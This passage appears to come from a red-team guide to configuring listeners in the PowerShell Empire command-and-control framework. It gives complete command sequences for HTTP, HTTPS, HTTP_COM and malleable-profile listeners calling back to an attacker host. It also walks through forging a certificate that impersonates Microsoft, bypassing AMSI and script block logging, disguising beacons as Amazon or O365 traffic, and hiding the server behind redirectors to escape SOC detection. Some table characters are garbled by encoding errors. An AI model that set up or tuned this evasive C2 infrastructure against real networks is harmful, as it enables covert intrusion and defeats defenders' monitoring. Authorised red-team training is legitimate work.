2. Listener Setup
Listener Type Comparisonβ
Choosing the right listener is the first evasion decision you make. Cleartext listeners work fine in a lab - on a monitored network, use HTTPS at minimum.
| Listener | Protocol | Detection Risk | Best For |
|---|---|---|---|
http | HTTP (cleartext) | High | Internal lab testing, non-monitored environments |
https | HTTPS (TLS) | Medium | Encrypted C2 that blends with normal web traffic |
http_com | HTTP via COM object | Medium-Low | Bypassing PowerShell AMSI/script block logging restrictions |
http_malleable | HTTP with custom profile | Low | Mimicking legitimate application traffic (Teams, O365, CDNs) |
http should never be used against a monitored target network. Any SOC with Zeek or Suricata will trivially identify Empire's default HTTP beacon pattern.
HTTP Listenerβ
Standard setup - use only in a lab or against non-monitored networks.
(Empire) > listeners
(Empire: listeners) > uselistener http
(Empire: listeners/http) > set Name http-lab
(Empire: listeners/http) > set Host http://<ATTACKER_IP>
(Empire: listeners/http) > set Port 80
(Empire: listeners/http) > execute
HTTPS Listener (with Custom Certificate)β
Encrypts C2 traffic. Without a custom cert, the default self-signed cert will trigger TLS anomaly alerts on monitored networks. Pair with a custom cert to reduce detection.
Generate a self-signed certificateβ
openssl req -new -x509 -keyout /tmp/empire.pem -out /tmp/empire.pem -days 365 -nodes \
-subj "/C=US/ST=Virginia/L=McLean/O=Microsoft Corporation/CN=microsoft.com"
Use a plausible organization name and CN that matches the traffic profile you are trying to blend with. microsoft.com, windowsupdate.com, or a CDN name are common choices.
Start the HTTPS listener with the custom certβ
(Empire) > listeners
(Empire: listeners) > uselistener https
(Empire: listeners/https) > set Name https-ops
(Empire: listeners/https) > set Host https://<ATTACKER_IP>
(Empire: listeners/https) > set Port 443
(Empire: listeners/https) > set CertPath /tmp/empire.pem
(Empire: listeners/https) > execute
CertPath expects a combined PEM file (cert + key in the same file). The openssl command above generates this format.
HTTP_COM Listenerβ
Routes C2 traffic through the Windows COM WinHttp.WinHttpRequest object rather than PowerShell's native Net.WebClient. This bypasses some AMSI implementations and PowerShell script block logging that inspect Net.WebClient calls.
(Empire: listeners) > uselistener http_com
(Empire: listeners/http_com) > set Name http-com-ops
(Empire: listeners/http_com) > set Host http://<ATTACKER_IP>
(Empire: listeners/http_com) > set Port 8080
(Empire: listeners/http_com) > execute
HTTP_COM agents are slightly larger than standard HTTP agents. If HTTPS is available and sufficient for your scenario, prefer it over HTTP_COM - it gives you both encryption and the COM transport benefit.
HTTP_Malleable Listener (Custom C2 Profile)β
The most evasion-capable listener. Uses a Malleable C2 profile (.profile file) to shape all HTTP requests and responses to match legitimate application traffic - headers, URIs, user agents, and response bodies are all configurable.
Obtain or write a profileβ
Pre-built profiles are available in the BC-Security Malleable C2 profiles repository. Example profiles mimic: Amazon, Bing, OneDrive, jQuery, Pandoc, and others.
Place the profile on the Empire server:
cp amazon.profile /usr/share/powershell-empire/empire/server/data/profiles/
Start the malleable listenerβ
(Empire: listeners) > uselistener http_malleable
(Empire: listeners/http_malleable) > set Name malleable-ops
(Empire: listeners/http_malleable) > set Host http://<ATTACKER_IP>
(Empire: listeners/http_malleable) > set Port 80
(Empire: listeners/http_malleable) > set ProfilePath /usr/share/powershell-empire/empire/server/data/profiles/amazon.profile
(Empire: listeners/http_malleable) > execute
For maximum evasion, pair HTTP_Malleable with a redirector (an Apache/nginx front-end that forwards C2 traffic to your Empire server while serving legitimate content to non-agent requests). This keeps the Empire server off the target network's radar.
Listener Managementβ
# List active listeners
(Empire: listeners) > list
# Kill a listener
(Empire: listeners) > kill <LISTENER_NAME>
# Disable without removing
(Empire: listeners) > disable <LISTENER_NAME>
Help Menuβ
(Empire: listeners) > help
βHelp Optionsβββ¬ββββββββββββββββββββββββββββββββββββββ¬βββββββββββββββββββββββββββββββ
β Name β Description β Usage β
ββββββββββββββββΌββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββ€
β disable β Disable the selected listener β disable <listener_name> β
ββββββββββββββββΌββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββ€
β editlistener β Edit the selected listener β editlistener <listener_name> β
β βββββββββββββββΌββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββ€
β enable β Enable the selected listener β enable <listener_name> β
ββββββββββββββββΌββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββ€
β help β Display the help menu for the β help β
β β current menu β β
ββββββββββββββββΌββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββ€
β kill β Kill the selected listener β kill <listener_name> β
ββββββββββββββββΌββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββ€
β list β Get running/available listeners β list β
ββββββββββββββββΌββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββ€
β options β Get option details for the selected β options <listener_name> β
β β listener β β
ββββββββββββββββ΄ββββββββββββββββββββββββββββββββββββββ΄βββββββββββββββββββββββββββββββ